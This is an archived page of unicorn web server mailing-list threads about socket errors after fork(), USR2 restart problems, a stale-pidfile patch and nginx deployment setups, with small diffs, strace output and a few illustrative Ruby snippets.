       [not found]       ` <CACsAZRR=NP4O+EB0koAr0aeUwth=M+5aQnA8vtVLEXqFHd=jnA@mail.gmail.com>
@ 2012-04-27 19:51  0%     ` Eric Wong
  2012-04-27 19:53  0%       ` Eric Wong
  2012-04-27 20:30  0%       ` Matt Smith
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2012-04-27 19:51 UTC (permalink / raw)
  To: George; +Cc: mongrel-unicorn, Matt Smith, Joel Nimety

George <lists@SouthernOhio.net> wrote:
> Just fyi, my dev logs are now rife with these: http://j.mp/IezMAu
> 
> Will plug your patch in, but will have to figure out another option for
> heroku deployment.

Is this affecting your heroku deployment?  What OS/kernel version
are you running?  From what Joel and Matt say, it could be more likely
to trigger on *BSD-based systems.

^ permalink raw reply	[relevance 0%]

* Re: app error: Socket is not connected (Errno::ENOTCONN)
  2012-04-27 19:51  0%     ` Eric Wong
@ 2012-04-27 19:53  0%       ` Eric Wong
  2012-04-27 20:30  0%       ` Matt Smith
  1 sibling, 0 replies; 200+ results
From: Eric Wong @ 2012-04-27 19:53 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: Joel Nimety, George, Matt Smith

Eric Wong <normalperson@yhbt.net> wrote:
> George <lists@SouthernOhio.net> wrote:
> > Just fyi, my dev logs are now rife with these: http://j.mp/IezMAu
> > 
> > Will plug your patch in, but will have to figure out another option for
> > heroku deployment.
> 
> Is this affecting your heroku deployment?  What OS/kernel version
> are you running?  From what Joel and Matt say, it could be more likely
> to trigger on *BSD-based systems.

Also, if you revert my previous patch, does this also prevent the error
from manifesting?

(I expect ignoring ENOTCONN _once_in_a_while_ will be required,
 but definitely not every request).

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 14a6f9a..bb91e7f 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -537,7 +537,7 @@ class Unicorn::HttpServer
     end
     @request.headers? or headers = nil
     http_response_write(client, status, headers, body)
-    client.shutdown # in case of fork() in Rack app
+    client.close_write # in case of fork() in Rack app
     client.close # flush and uncork socket immediately, no keepalive
   rescue => e
     handle_error(client, e)
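
The reason shutdown(2) was there at all: unlike close(2), it tears the
connection down for every process holding a copy of the descriptor.  A
minimal illustration of that difference (an editor's sketch, not from
the thread):

```ruby
require 'socket'

# shutdown() acts on the connection itself, not on one file
# descriptor: even though the forked child still holds open copies of
# both sockets, the reader sees EOF immediately.  A plain close() in
# the parent would not have that effect, because the child's copy
# keeps the kernel object alive.
a, b = UNIXSocket.pair
pid = fork { sleep 0.3 }   # child inherits copies of both sockets

a.shutdown                 # SHUT_RDWR, regardless of the fd refcount
data = b.read              # returns "" at once: EOF despite child's fds
Process.wait(pid)
```

close_write (the patched code) is the gentler shutdown(SHUT_WR): it
half-closes the stream so the peer sees EOF, without tearing down the
read side.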

^ permalink raw reply related	[relevance 0%]

* Re: Background jobs with #fork
  2012-04-12 22:41  6%   ` Patrik Wenger
@ 2012-04-12 23:04  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-04-12 23:04 UTC (permalink / raw)
  To: unicorn list; +Cc: Patrik Wenger

Patrik Wenger <paddor@gmail.com> wrote:
> Thanks for the answers.

No problem.

> Isn't there another way to retrieve the right socket?

Actually, I think my proposed patch (in reply to Hongli) at
http://mid.gmane.org/20120412221022.GA20640@dcvr.yhbt.net
should fix your issue.

> > I can probably writeup a better explanation (perhaps on the usp.ruby
> > (Unix Systems Programming for Ruby mailing list) if this doesn't make
> > sense.

> Yeah I don't really understand this part. The "hanging" Unicorn worker
> can read another request because the client socket wasn't closed
> because it's still open in the child process? I would appreciate a
> better explanation, thank you.

Basically, fork() has a similar effect as dup() in that it creates
multiple references to the same kernel object (the client socket).

close() basically lowers the refcount of a kernel object, when the
refcount is zero, resources inside the kernel are freed.  When
the refcount of a kernel object reaches zero, a shutdown(SHUT_RDWR)
is implied.

This works for 99% of Rack apps since they don't fork() nor call dup()
on the client socket, so refcount==1 when unicorn calls close(), leading
to unicorn setting refcount=0 upon close() => everything is freed.

However, since the client socket increments refcount via fork(),
close() in the parent (unicorn worker) no longer implies
shutdown(SHUT_RDWR).



  parent timeline                  | child timeline
  ------------------------------------------------------------------
                                   |
  accept() -> sockfd created       | (child doesn't exist, yet)
  sockfd.refcount == 1             |
                                   |
  fork()                           | child exists, now
                                   |

    sockfd is shared by both processes now: sockfd.refcount == 2
    if either the child or parent forks again: sockfd.refcount += 1

                                   |
  close() => sockfd.refcount -= 1  | child continues running

    since sockfd.refcount == 1 at this point, the socket is still
    considered "alive" by the kernel.  If the child calls close()
    (or exits), sockfd.refcount is decremented again (and now
    reaches zero).

Now, to write this as a commit message :>
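
The timeline above can be reproduced in a few lines (an illustrative
sketch; the variable names are made up):

```ruby
require 'socket'

# fork() leaves the child with its own reference to the socket, so
# the parent's close() only drops the kernel refcount from 2 to 1;
# the connection stays alive until the child also closes (or exits).
parent_sock, other_end = UNIXSocket.pair

pid = fork do
  sleep 0.2                 # child keeps its copy open for a while
  parent_sock.write("still alive")
  parent_sock.close         # refcount 1 -> 0: now the socket dies
end

parent_sock.close           # refcount 2 -> 1: no EOF for other_end yet
data = other_end.read       # blocks until the child's copy is closed
Process.wait(pid)
```

This is exactly why a Rack app that forks can leave the original
client waiting long after the unicorn worker thinks it is done.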

^ permalink raw reply	[relevance 0%]

* Re: Background jobs with #fork
  @ 2012-04-12 22:41  6%   ` Patrik Wenger
  2012-04-12 23:04  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Patrik Wenger @ 2012-04-12 22:41 UTC (permalink / raw)
  To: unicorn list

Thanks for the answers.

> So you're only calling fork and not exec (or system/popen, right?)  It
> may be the case that the client socket is kept alive in the background
> process.

Yes, I'm only calling Kernel#fork. @Eric, your guess makes sense to me.

> The client socket has the close-on-exec flag (FD_CLOEXEC) set, but
> there's no close-on-fork flag, so you might have to find + close it
> yourself.  Here's is a nasty workaround for the child process:
> 
>  ObjectSpace.each_object(Kgio::Socket) do |io|
>    io.close unless io.closed?
>  end

Isn't there another way to retrieve the right socket?

Here some additional info that might bring some clarification.

Another action in the same controller which does about the same regarding the background job works (check.run!).
The only differences I see are:

1) it's called via AJAX
2) the response is nothing (render :nothing => true) instead of a redirect (redirect_to checks_path)

I reckon the second difference kind of confirms Eric's guess, as the client socket probably isn't considered anymore with render :nothing => true.

> However, nginx can still forward subsequent requests to the same unicorn
> (even the same unicorn worker), because as far as the unicorn worker is
> concerned (but not the OS), it's done with the original request.  It's
> just the original request (perhaps the original client) is stuck
> waiting for the background process to finish.
> 
> I can probably writeup a better explanation (perhaps on the usp.ruby
> (Unix Systems Programming for Ruby mailing list) if this doesn't make
> sense.

Yeah I don't really understand this part. The "hanging" Unicorn worker can read another request because the client socket wasn't closed because it's still open in the child process? I would appreciate a better explanation, thank you.

^ permalink raw reply	[relevance 6%]

* [ANN] unicorn 4.2.1 - minor fix and doc updates
@ 2012-03-26 21:45  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-03-26 21:45 UTC (permalink / raw)
  To: mongrel-unicorn

Changes:

* Stale pid files are detected if a pid is recycled by processes
  belonging to another user, thanks to Graham Bleach.
* nginx example config updates thanks to Eike Herzbach.
* KNOWN_ISSUES now documents issues with apps/libs that install
  conflicting signal handlers.

* http://unicorn.bogomips.org/
* mongrel-unicorn@rubyforge.org
* git://bogomips.org/unicorn.git
* http://unicorn.bogomips.org/NEWS.atom.xml

^ permalink raw reply	[relevance 4%]

* unicorn 4.2.1 release soon?
@ 2012-03-22  6:30  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-03-22  6:30 UTC (permalink / raw)
  To: mongrel-unicorn

There's not much going on in unicorn.git nowadays; everything's
stabilized nicely over the past few years.

This release would mainly be for Graham's EPERM fix/workaround for
stale pid files and some documentation fixes and improvements.

Shortlog below:

  Eric Wong (4):
        examples/nginx.conf: remove redundant word
        examples/nginx.conf: use $scheme instead of hard-coded "https"
        KNOWN_ISSUES: document signal conflicts in libs/apps
        log EPERM errors from invalid pid files

  Graham Bleach (1):
        Start the server if another user has a PID matching our stale pidfile.

$ git clone git://bogomips.org/unicorn.git


I'm also going on vacation soon, so I'll have almost no Internet access
for a few weeks.  Help each other out when I'm away, thanks :)

^ permalink raw reply	[relevance 4%]

* Re: Unicorn_rails ignores USR2 signal
  2012-03-20 23:09  3%                   ` Yeung, Jeffrey
@ 2012-03-21  2:27  0%                     ` Devin Ben-Hur
  0 siblings, 0 replies; 200+ results
From: Devin Ben-Hur @ 2012-03-21  2:27 UTC (permalink / raw)
  To: unicorn list; +Cc: Yeung, Jeffrey

On 3/20/12 4:09 PM, Yeung, Jeffrey wrote:
> I have been unable to narrow down the cause of the conflict so far.  The list of Ruby gems (and gem versions) on the affected deployment are identical to the ones on another deployment where Unicorn is upgrading just fine (with preloaded app).  Grep'ing for USR2 in the gem installations did not reveal anything,  unfortunately.  Since then, I haven't been able to spend further time investigating.  Not sure where else to look, really, but I'm open to further suggestions.

Jeffery,

To uncover the culprit, you might try monkey-patching Kernel.trap and 
Signal.trap so it logs the last few entries in caller when it's called 
with USR2.

Put something like this really early in your app bootstrap:

[Kernel, Signal].each do |klass|
  class << klass
    alias :orig_trap :trap
    def trap(*args, &block)
      if args.first.to_s =~ /USR2$/i || args.first.to_i == 31
        $stderr.puts "Caught someone trapping USR2, caller is:",
                     caller.last(2)
      end
      orig_trap(*args, &block)
    end
  end
end

^ permalink raw reply	[relevance 0%]

* RE: Unicorn_rails ignores USR2 signal
  @ 2012-03-20 23:09  3%                   ` Yeung, Jeffrey
  2012-03-21  2:27  0%                     ` Devin Ben-Hur
  0 siblings, 1 reply; 200+ results
From: Yeung, Jeffrey @ 2012-03-20 23:09 UTC (permalink / raw)
  To: Eric Wong, unicorn list

Eric,

I have been unable to narrow down the cause of the conflict so far.  The list of Ruby gems (and gem versions) on the affected deployment are identical to the ones on another deployment where Unicorn is upgrading just fine (with preloaded app).  Grep'ing for USR2 in the gem installations did not reveal anything,  unfortunately.  Since then, I haven't been able to spend further time investigating.  Not sure where else to look, really, but I'm open to further suggestions.

-Jeff

-----Original Message-----
From: Eric Wong [mailto:normalperson@yhbt.net] 
Sent: Tuesday, March 20, 2012 12:58 PM
To: unicorn list
Cc: Yeung, Jeffrey
Subject: Re: Unicorn_rails ignores USR2 signal

Eric Wong <normalperson@yhbt.net> wrote:
> "Yeung, Jeffrey" <Jeffrey.Yeung@polycom.com> wrote:
> > Sorry for the delay.  It looks like disabling preload_app did the 
> > trick.  A new master was created after sending the USR2.  Now the 
> > $$$ question is, what in the world is intercepting the signal?  :S
> 
> Good to know, I'd just grep the installation directories for all your 
> Ruby libs + gems for USR2.  I haven't seen this problem before, but 
> it'd be good to document the conflict, at least.

Btw, did you ever figure out what was causing the conflict?

Pushing this out to git://bogomips.org/unicorn.git

>From 1e13ffee3469997286e65e0563b6433e7744388a Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Tue, 20 Mar 2012 19:51:35 +0000
Subject: [PATCH] KNOWN_ISSUES: document signal conflicts in libs/apps

Jeffrey Yeung confirmed this issue on the mailing list.

ref: <E8D9E7CCC2621343A0A3BB45E8DEDFA91C682DD23D@CRPMBOXPRD04.polycom.com>
---
 KNOWN_ISSUES |    5 +++++
 1 file changed, 5 insertions(+)

diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index f323c68..38263e7 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -3,6 +3,11 @@
 Occasionally odd {issues}[link:ISSUES.html] arise without a transparent or
 acceptable solution.  Those issues are documented here.
 
+* Some libraries/applications may install signal handlers which conflict
+  with signal handlers unicorn uses.  Leaving "preload_app false"
+  (the default) will allow unicorn to always override existing signal
+  handlers.
+
 * Issues with FreeBSD jails can be worked around as documented by Tatsuya Ono:
   http://mid.gmane.org/CAHBuKRj09FdxAgzsefJWotexw-7JYZGJMtgUp_dhjPz9VbKD6Q@mail.gmail.com
 

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Start the server if another user has a PID matching our stale pidfile.
  2012-02-29 17:25 10% ` Eric Wong
@ 2012-03-20 20:10  9%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-03-20 20:10 UTC (permalink / raw)
  To: unicorn list

Eric Wong <normalperson@yhbt.net> wrote:
> Graham Bleach <graham@darkskills.org.uk> wrote:
> > If unicorn doesn't get terminated cleanly (for example if the machine
> > has its power interrupted) and the pid in the pidfile gets used by
> > another process, the current unicorn code will exit and not start a
> > server. This tiny patch fixes that behaviour.
> 
> Thanks!  Acked-by: Eric Wong <normalperson@yhbt.net>
> 
> and pushed to master on git://bogomips.org/unicorn.git

Btw, I also pushed this to be a little more informative:

>From d0e7d8d770275654024887a05d9e986589ba358c Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Tue, 20 Mar 2012 20:05:59 +0000
Subject: [PATCH] log EPERM errors from invalid pid files

In some cases, EPERM may indicate a real configuration problem,
but it can also just mean the pid file is stale.
---
 lib/unicorn/http_server.rb |    5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 0c2af5d..ede6264 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -656,7 +656,10 @@ class Unicorn::HttpServer
     wpid <= 0 and return
     Process.kill(0, wpid)
     wpid
-    rescue Errno::ESRCH, Errno::ENOENT, Errno::EPERM
+    rescue Errno::EPERM
+      logger.info "pid=#{path} possibly stale, got EPERM signalling PID:#{wpid}"
+      nil
+    rescue Errno::ESRCH, Errno::ENOENT
       # don't unlink stale pid files, racy without non-portable locking...
   end
 
-- 

^ permalink raw reply related	[relevance 9%]

* RE: Unicorn_rails ignores USR2 signal
  2012-03-12 21:21  0%           ` Eric Wong
@ 2012-03-12 22:39  0%             ` Yeung, Jeffrey
    0 siblings, 1 reply; 200+ results
From: Yeung, Jeffrey @ 2012-03-12 22:39 UTC (permalink / raw)
  To: Eric Wong, unicorn list

Hi Eric,

Sorry for the delay.  It looks like disabling preload_app did the trick.  A new master was created after sending the USR2.  Now the $$$ question is, what in the world is intercepting the signal?  :S

And this is a little late now, but here's the strace of a USR2 signal followed by a TTOU signal, with preload_app true (latter signal working okay in this case):

[pid 14542] --- SIGUSR2 (User defined signal 2) @ 0 (0) ---
[pid 14542] rt_sigreturn(0x20)          = 202
[pid 14535] <... select resumed> )      = 0 (Timeout)
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = 0
[pid 14535] select(6, [5], NULL, NULL, {60, 0} <unfinished ...>
[pid 14542] --- SIGTTOU (Stopped (tty output)) @ 0 (0) ---
[pid 14542] rt_sigreturn(0x16)          = -1 EINTR (Interrupted system call)
[pid 14553] rt_sigprocmask(SIG_SETMASK, ~[SEGV VTALRM RTMIN RT_1], NULL, 8) = 0
[pid 14553] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[pid 14553] tgkill(14535, 14535, SIGVTALRM) = 0
[pid 14535] <... select resumed> )      = ? ERESTARTNOHAND (To be restarted)
[pid 14535] --- SIGVTALRM (Virtual timer expired) @ 0 (0) ---
[pid 14535] rt_sigreturn(0x1a)          = -1 EINTR (Interrupted system call)
[pid 14535] fcntl(6, F_GETFL)           = 0x1 (flags O_WRONLY)
[pid 14535] fcntl(6, F_SETFL, O_WRONLY|O_NONBLOCK) = 0
[pid 14535] write(6, ".", 1)            = 1
[pid 14535] select(6, [5], NULL, NULL, {59, 939700}) = 1 (in [5], left {59, 939696})
[pid 14535] fcntl(5, F_GETFL)           = 0 (flags O_RDONLY)
[pid 14535] fcntl(5, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
[pid 14535] read(5, ".", 11)            = 1
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = 0
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = 0
[pid 14535] kill(14552, SIGQUIT)        = 0
[pid 14535] select(6, [5], NULL, NULL, {60, 0} <unfinished ...>
[pid 14542] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 14542] rt_sigreturn(0x11)          = -1 EINTR (Interrupted system call)
[pid 14553] rt_sigprocmask(SIG_SETMASK, ~[SEGV VTALRM RTMIN RT_1], NULL, 8) = 0
[pid 14553] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[pid 14553] tgkill(14535, 14535, SIGVTALRM) = 0
[pid 14535] <... select resumed> )      = ? ERESTARTNOHAND (To be restarted)
[pid 14535] --- SIGVTALRM (Virtual timer expired) @ 0 (0) ---
[pid 14535] rt_sigreturn(0x1a)          = -1 EINTR (Interrupted system call)
[pid 14535] fcntl(6, F_GETFL)           = 0x801 (flags O_WRONLY|O_NONBLOCK)
[pid 14535] write(6, ".", 1)            = 1
[pid 14535] select(6, [5], NULL, NULL, {59, 880004}) = 1 (in [5], left {59, 880001})
[pid 14535] fcntl(5, F_GETFL)           = 0x800 (flags O_RDONLY|O_NONBLOCK)
[pid 14535] read(5, ".", 11)            = 1
[pid 14535] wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], WNOHANG, NULL) = 14552
[pid 14535] write(2, "reaped #<Process::Status: pid 14"..., 53) = 53
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = -1 ECHILD (No child processes)
[pid 14535] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[pid 14535] select(6, [5], NULL, NULL, {119, 0}

-----Original Message-----
From: Eric Wong [mailto:normalperson@yhbt.net] 
Sent: Monday, March 12, 2012 2:21 PM
To: unicorn list
Cc: Yeung, Jeffrey
Subject: Re: Unicorn_rails ignores USR2 signal

Eric Wong <normalperson@yhbt.net> wrote:
> However, there's another possibility I hadn't considered, what if you 
> disable preload_app?  Your app or some libs it uses may be 
> intercepting
> USR2 for something it does.

Ping?  Was this it?

^ permalink raw reply	[relevance 0%]

* Re: Unicorn_rails ignores USR2 signal
  2012-03-10  1:30  5%         ` Eric Wong
@ 2012-03-12 21:21  0%           ` Eric Wong
  2012-03-12 22:39  0%             ` Yeung, Jeffrey
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-03-12 21:21 UTC (permalink / raw)
  To: unicorn list; +Cc: Yeung, Jeffrey

Eric Wong <normalperson@yhbt.net> wrote:
> However, there's another possibility I hadn't considered, what if you
> disable preload_app?  Your app or some libs it uses may be intercepting
> USR2 for something it does.

Ping?  Was this it?

^ permalink raw reply	[relevance 0%]

* Re: Unicorn_rails ignores USR2 signal
  @ 2012-03-10  1:30  5%         ` Eric Wong
  2012-03-12 21:21  0%           ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-03-10  1:30 UTC (permalink / raw)
  To: unicorn list; +Cc: Yeung, Jeffrey

"Yeung, Jeffrey" <Jeffrey.Yeung@polycom.com> wrote:
> I have it configured for 4 workers.  I just turned it down to 1 worker
> and tested both TTIN and TTOU.  They both work, creating and killing
> workers, respectively.  The following is the strace capture from an
> TTOU signal, followed by a USR2 signal.  Yes, that is the only output
> from the USR2 signal.  Behavior doesn't change if the master is
> freshly started, or has been running for a while.  One other thing I
> did not mention earlier is that the <pid>.oldbin file never gets
> created on the USR2 signal, but that's probably obvious already.

I also asked you to send another signal after USR2; can you try that?

However, there's another possibility I hadn't considered, what if you
disable preload_app?  Your app or some libs it uses may be intercepting
USR2 for something it does.

Maybe this patch can work, but this may also silently break your
application/lib, too...

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 7d2c623..1b9d693 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -128,8 +128,7 @@ class Unicorn::HttpServer
     # setup signal handlers before writing pid file in case people get
     # trigger happy and send signals as soon as the pid file exists.
     # Note that signals don't actually get handled until the #join method
-    QUEUE_SIGS.each { |sig| trap(sig) { SIG_QUEUE << sig; awaken_master } }
-    trap(:CHLD) { awaken_master }
+    master_siginit
     self.pid = config[:pid]
 
     self.master_pid = $$
@@ -689,6 +688,9 @@ class Unicorn::HttpServer
         Gem.refresh
       end
       self.app = app.call
+
+      # override signal handlers the app may have set
+      master_siginit if preload_app
     end
   end
 
@@ -736,4 +738,9 @@ class Unicorn::HttpServer
     config_listeners.each { |addr| listen(addr) }
     raise ArgumentError, "no listeners" if LISTENERS.empty?
   end
+
+  def master_siginit
+    QUEUE_SIGS.each { |sig| trap(sig) { SIG_QUEUE << sig; awaken_master } }
+    trap(:CHLD) { awaken_master }
+  end
 end
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 5%]

* Re: [PATCH] Start the server if another user has a PID matching our stale pidfile.
  2012-02-29 14:34 14% [PATCH] Start the server if another user has a PID matching our stale pidfile Graham Bleach
@ 2012-02-29 17:25 10% ` Eric Wong
  2012-03-20 20:10  9%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-02-29 17:25 UTC (permalink / raw)
  To: unicorn list

Graham Bleach <graham@darkskills.org.uk> wrote:
> If unicorn doesn't get terminated cleanly (for example if the machine
> has its power interrupted) and the pid in the pidfile gets used by
> another process, the current unicorn code will exit and not start a
> server. This tiny patch fixes that behaviour.

Thanks!  Acked-by: Eric Wong <normalperson@yhbt.net>

and pushed to master on git://bogomips.org/unicorn.git

^ permalink raw reply	[relevance 10%]

* [PATCH] Start the server if another user has a PID matching our stale pidfile.
@ 2012-02-29 14:34 14% Graham Bleach
  2012-02-29 17:25 10% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Graham Bleach @ 2012-02-29 14:34 UTC (permalink / raw)
  To: mongrel-unicorn

If unicorn doesn't get terminated cleanly (for example if the machine
has its power interrupted) and the pid in the pidfile gets used by
another process, the current unicorn code will exit and not start a
server. This tiny patch fixes that behaviour.


---
 lib/unicorn/http_server.rb |    2 +-
 1 files changed, 1 insertions(+), 1 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 7d2c623..0c2af5d 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -656,7 +656,7 @@ class Unicorn::HttpServer
     wpid <= 0 and return
     Process.kill(0, wpid)
     wpid
-    rescue Errno::ESRCH, Errno::ENOENT
+    rescue Errno::ESRCH, Errno::ENOENT, Errno::EPERM
       # don't unlink stale pid files, racy without non-portable locking...
   end

-- 
1.7.5.4
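To sketch the semantics the patch relies on (`stale_pid?` is a hypothetical helper, not unicorn code): `Process.kill(0, pid)` probes a pid without delivering a signal, and raises `Errno::EPERM` when the pid is alive but owned by another user, so a stale-pidfile check must treat EPERM like ESRCH:

```ruby
# Signal 0 only checks whether we *could* signal the process.
def stale_pid?(pid)
  Process.kill(0, pid)
  false               # process exists and we may signal it: pidfile is live
rescue Errno::ESRCH
  true                # no such process: pidfile is stale
rescue Errno::EPERM
  true                # pid recycled by another user's process: also stale
end

stale_pid?($$) # => false; we can always signal ourselves
```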

^ permalink raw reply related	[relevance 14%]

* Re: Should USR2 always work?
  2011-11-21 23:14  4% Should USR2 always work? Laurens Pit
@ 2011-11-22  1:16  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-11-22  1:16 UTC (permalink / raw)
  To: unicorn list; +Cc: Laurens Pit

Laurens Pit <laurens.pit@mirror42.com> wrote:
> I didn't expect that to be the case, but in the past year occasionally
> I've found I had to resort to QUIT and start all over in order
> to get all components loaded correctly.
> 
> Specifically: yesterday I upgraded several projects to rails 3.0.11
> and added a new i18n .yml file in the config dir. After the USR2 QUIT
> sequence all new code seemed to work fine. Except the new .yml file
> wasn't loaded. Another run of USR2 and QUIT didn't resolve it. Only
> after QUIT and start of unicorn was the new .yml file loaded.
> 
> This was not just on one machine, which might have been a fluke. This
> was on all machines for all projects, consistently.
> 
> Any ideas?

Anything from stderr log files?  USR2 will fail if there's

* compile/load error when loading the app (if preload_app=true)

* unicorn/unicorn_rails executable script is missing
  (maybe Bundler is moving it?)

* Ruby installation got moved/shifted/changed

* Working directory got _moved_ (cap may cycle those out)
  You can set "working_directory" in your unicorn config
  to work around it.

  (and maybe other reasons I can't think of right now)

Come to think of it, the missing working directory case
could be the most common...

But stderr log files (stderr_path) should always tell you what's
going on.

== Linux(-only?) tip:

If the log files got deleted somehow, you may still be able to read it
via: "cat /proc/$PID/fd/2" on either the PID of the master or _any_
worker process.

To read some other log files, you can just replace the "2" with whatever
file descriptor.  Reading the symlinks ("ls -l /proc/$PID/fd/") will
tell you where each descriptor is pointed to, even if it is a deleted
file.
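The same inspection is scriptable; a quick Linux-only sketch in Ruby that lists where each descriptor of a process points (deleted-but-open files show a " (deleted)" suffix and remain readable via /proc/PID/fd/N):

```ruby
pid = $$ # inspect ourselves; substitute the unicorn master or worker pid
Dir.glob("/proc/#{pid}/fd/*").sort.each do |fd|
  begin
    puts "#{File.basename(fd)} -> #{File.readlink(fd)}"
  rescue Errno::ENOENT
    # descriptor closed between glob and readlink; ignore
  end
end
```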

^ permalink raw reply	[relevance 0%]

* Should USR2 always work?
@ 2011-11-21 23:14  4% Laurens Pit
  2011-11-22  1:16  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Laurens Pit @ 2011-11-21 23:14 UTC (permalink / raw)
  To: Unicorn List

Hi,

When deploying new code we go through the USR2 QUIT sequence. This works very nicely and gives zero downtime.

My question is whether there are instances when this sequence is known to not work, and instead you should really send QUIT first and then start all over?

I didn't expect that to be the case, but in the past year occasionally I've found I had to resort to QUIT and start all over in order to get all components loaded correctly.

Specifically: yesterday I upgraded several projects to rails 3.0.11 and added a new i18n .yml file in the config dir. After the USR2 QUIT sequence all new code seemed to work fine. Except the new .yml file wasn't loaded. Another run of USR2 and QUIT didn't resolve it. Only after QUIT and start of unicorn was the new .yml file loaded.

This was not just on one machine, which might have been a fluke. This was on all machines for all projects, consistently.

Any ideas?



Cheers,
Lawrence

^ permalink raw reply	[relevance 4%]

* Re: nginx + unicorn deployment survey
  2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
  2011-11-15  2:00  0% ` Jason Su
  2011-11-15  5:07  0% ` Christopher Bailey
@ 2011-11-15 17:47  0% ` Alex Sharp
  2 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2011-11-15 17:47 UTC (permalink / raw)
  To: unicorn list

We run nginx and unicorn on the same instance, behind HAProxy. 

We run it this way because it means fewer instances, and the nginx processes don't seem to require many system resources, so putting them on the same instance doesn't create a resource constraint. 

--
Alex Sharp

Zaarly, Inc.
@ajsharp | github.com/ajsharp | alexjsharp.com


On Monday, November 14, 2011 at 1:56 PM, Eric Wong wrote:

> Hello all, I'm wondering if you deploy nginx:
> 
> 1) on the same machine that runs unicorn (exclusively proxying to that)
> 
> 2) on a different machine that doesn't run unicorn
> 
> 3) both, nginx could forward to either to localhost
> or another host on the same LAN
> 
> And of course, the reason(s) you chose what you chose. I'm inclined
> to believe many folks are on 1) simply because they only have one
> machine.
> 
> Thanks in advance for your replies, I'm always interested in
> hearing user experiences with unicorn.




^ permalink raw reply	[relevance 0%]

* Re: nginx + unicorn deployment survey
  2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
  2011-11-15  2:00  0% ` Jason Su
@ 2011-11-15  5:07  0% ` Christopher Bailey
  2011-11-15 17:47  0% ` Alex Sharp
  2 siblings, 0 replies; 200+ results
From: Christopher Bailey @ 2011-11-15  5:07 UTC (permalink / raw)
  To: unicorn list

We run Nginx+Unicorn on each app server (we have several), and then
have HAProxy in front of the whole thing.  This is basically because
that's the standard Engine Yard setup.

On Mon, Nov 14, 2011 at 1:56 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Hello all, I'm wondering if you deploy nginx:
>
> 1) on the same machine that runs unicorn (exclusively proxying to that)
>
> 2) on a different machine that doesn't run unicorn
>
> 3) both, nginx could forward to either to localhost
>   or another host on the same LAN
>
> And of course, the reason(s) you chose what you chose.  I'm inclined
> to believe many folks are on 1) simply because they only have one
> machine.
>
> Thanks in advance for your replies, I'm always interested in
> hearing user experiences with unicorn.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
>



-- 
Christopher Bailey
Cobalt Edge LLC
http://cobaltedge.com

^ permalink raw reply	[relevance 0%]

* Re: nginx + unicorn deployment survey
  2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
@ 2011-11-15  2:00  0% ` Jason Su
  2011-11-15  5:07  0% ` Christopher Bailey
  2011-11-15 17:47  0% ` Alex Sharp
  2 siblings, 0 replies; 200+ results
From: Jason Su @ 2011-11-15  2:00 UTC (permalink / raw)
  To: unicorn list

I have 9 machines each running nginx + unicorn. Maybe that's not the
best setup...

On Mon, Nov 14, 2011 at 1:56 PM, Eric Wong <normalperson@yhbt.net> wrote:
>
> Hello all, I'm wondering if you deploy nginx:
>
> 1) on the same machine that runs unicorn (exclusively proxying to that)
>
> 2) on a different machine that doesn't run unicorn
>
> 3) both, nginx could forward to either to localhost
>   or another host on the same LAN
>
> And of course, the reason(s) you chose what you chose.  I'm inclined
> to believe many folks are on 1) simply because they only have one
> machine.
>
> Thanks in advance for your replies, I'm always interested in
> hearing user experiences with unicorn.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
